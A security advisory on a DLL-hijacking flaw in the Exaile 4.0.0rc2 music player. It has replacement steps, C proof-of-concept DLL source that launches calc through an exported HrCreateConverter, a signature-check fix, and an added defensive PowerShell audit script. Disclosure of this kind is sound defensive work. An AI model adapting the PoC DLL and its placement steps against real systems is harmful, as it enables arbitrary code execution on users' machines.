Document Title:
===============
Exaile 4.0.0rc2 - Insecure DLL/Remote Code Execution
Product & Service Introduction:
===============================
Exaile is a music player with a simple interface and powerful music management features.
Features include automatic album art retrieval, lyrics retrieval, Internet radio broadcasting, tabbed playlists, smart playlists with extensive filtering / search functions, and more.
(Copy of the Vendor Homepage: https://www.exaile.org/)
Date of Discovery:
==================
2018-09-24
Exploitation Technique:
=======================
Local & Remote
Platform Tested:
===============
Windows 7 & 10
Technical Details & Description:
================================
A local insecure DLL loading issue has been discovered in the official Exaile v4.0.0rc2 software.
Exaile does not verify the digital signature of the file named "libtag.dll" before loading it, which allows the execution of arbitrary code in the context of the application.
Vulnerable Software:
[+] Exaile
Vulnerable version(s):
[+] 4.0.0rc2
Affected Libraries:
[+] libtag.dll
Proof of Concept (PoC):
=======================
To demonstrate the issue or to replicate the execution of arbitrary code, follow the information provided and the steps below.
Manual steps to reproduce the local vulnerability ...
1. Compile the DLL (PoC source below)
2. Rename the dynamic link library to libtag.dll
3. Go to the "C:\Program Files\Exaile" folder and look for the DLL named "libtag.dll"
4. Rename the original DLL "libtag.dll" to "libtag1.dll"
5. Place your malicious DLL in the "C:\Program Files\Exaile" directory and rename it to "libtag.dll"
6. Launch exaile.exe
7. Now the calculator executes!
-- PoC Exploit --
#include <windows.h>
#include <stdlib.h>
#define DLLIMPORT __declspec (dllexport)
/* Declared before first use so the export below compiles with a C99+ compiler. */
int evil(void);
/* Exported entry point that the PoC expects the host process to resolve. */
DLLIMPORT void HrCreateConverter() { evil(); }
int evil(void)
{
    /* Demonstration payload: launch the calculator, then end the host process. */
    WinExec("calc", 0);
    exit(0);
    return 0;
}
Solution – Fix & Patch:
=======================
Verify the digital signature of libtag.dll before loading it.
If the signature is missing or invalid, the DLL is simply not loaded and Exaile will not be able to run.
Verifying the DLL signature makes tampering with the library considerably more difficult.
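One way to check an installed copy for the condition this advisory describes, as an added example that is not part of the advisory or of the Exaile project: it audits every DLL in the install folder for a missing or invalid Authenticode signature and for leftover renamed copies such as "libtag1.dll". The function name Test-ExaileDllIntegrity is an assumption, and the default path is the one named in the PoC steps.

```powershell
# Added example (not from the advisory): audit the Exaile install directory for
# DLLs whose Authenticode signature is missing or invalid, and for renamed
# siblings of the expected DLL (e.g. "libtag1.dll" next to "libtag.dll").
function Test-ExaileDllIntegrity {
    [CmdletBinding()]
    param(
        [string]$InstallDir = 'C:\Program Files\Exaile',   # path from the PoC steps
        [string[]]$ExpectedDll = @('libtag.dll')           # DLLs the loader expects here
    )

    if (-not (Test-Path -LiteralPath $InstallDir)) {
        throw "Install directory not found: $InstallDir"
    }

    $findings = @()
    foreach ($dll in Get-ChildItem -LiteralPath $InstallDir -Filter '*.dll' -File) {
        $sig  = Get-AuthenticodeSignature -FilePath $dll.FullName
        $hash = (Get-FileHash -LiteralPath $dll.FullName -Algorithm SHA256).Hash

        # Anything other than 'Valid' (NotSigned, HashMismatch, UnknownError, ...)
        # means the file cannot be tied to a trusted publisher.
        $signed = ($sig.Status -eq 'Valid')

        # A sibling whose name extends an expected DLL's name matches the rename
        # step in the PoC and deserves a look even if the replacement is signed.
        $stem = [System.IO.Path]::GetFileNameWithoutExtension($dll.Name)
        $isRenamedCopy = $ExpectedDll | Where-Object {
            $expStem = [System.IO.Path]::GetFileNameWithoutExtension($_)
            ($stem -ne $expStem) -and ($stem -like "$expStem*")
        }

        $findings += [pscustomobject]@{
            File       = $dll.Name
            Status     = $sig.Status
            Signer     = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
            Sha256     = $hash
            LastWrite  = $dll.LastWriteTimeUtc
            Suspicious = (-not $signed) -or [bool]$isRenamedCopy
        }
    }

    # Unsigned, invalid or renamed files are listed first.
    $findings | Sort-Object -Property @{Expression = 'Suspicious'; Descending = $true}, File
}

Test-ExaileDllIntegrity | Format-Table -AutoSize
```

A DLL the vendor ships unsigned will report NotSigned even when untouched, so compare the SHA256 column against a known-good installation rather than relying on Status alone.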
Disclaimer:
===========
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the
author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
Copyright © 2018 | ZwX - Security Researcher (Software & web application)